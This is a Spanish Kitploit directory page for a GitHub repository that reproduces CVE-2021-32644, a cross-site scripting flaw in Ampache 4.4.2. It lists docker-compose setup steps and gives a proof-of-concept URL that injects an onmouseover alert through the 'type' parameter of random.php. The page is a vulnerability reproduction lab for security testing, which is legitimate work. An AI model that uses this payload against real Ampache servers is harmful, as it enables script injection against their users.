Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-32644 — Ampache XSS | Kitploit
Herramientas/GitHubGitHub/dnr6419/cve-2021-32644
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubdnr6419/cve-2021-32644

CVE-2021-32644

Ampache XSS

Ver Repositorio
hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-32644

Esta vulnerabilidad es una vulnerabilidad XSS que afectó a las versiones anteriores a Ampache 4.4.3. https://nvd.nist.gov/vuln/detail/CVE-2021-32644

Orden de instalación y ejecución

1. Instalación de Ampache

Al realizar la instalación, por favor, haga el reenvío de puertos en el archivo docker-compose.yml. La versión de Ampache que se instala actualmente es la 4.4.2.

root@kitploit:~
 $docker-compose up  

2. Acceso a Ampache

Vaya a http://[web-server ip]:port/.

2. Acceso a Ampache y configuración de mysql

Vaya a http://[web-server ip]:port/. Configure la base de datos mysql como se muestra en la siguiente imagen. image

3. PoC

Al insertar el siguiente PoC, se puede ver que se produce la vulnerabilidad XSS.

root@kitploit:~
 http://[ip]:port/random.php?action=get_advanced&type=%27%22%20onmouseover%3dalert(0x0002DE)%20

image

Fuente

https://packetstormsecurity.com/files/163620/Ampache-4.4.2-Cross-Site-Scripting.html

Descargar herramienta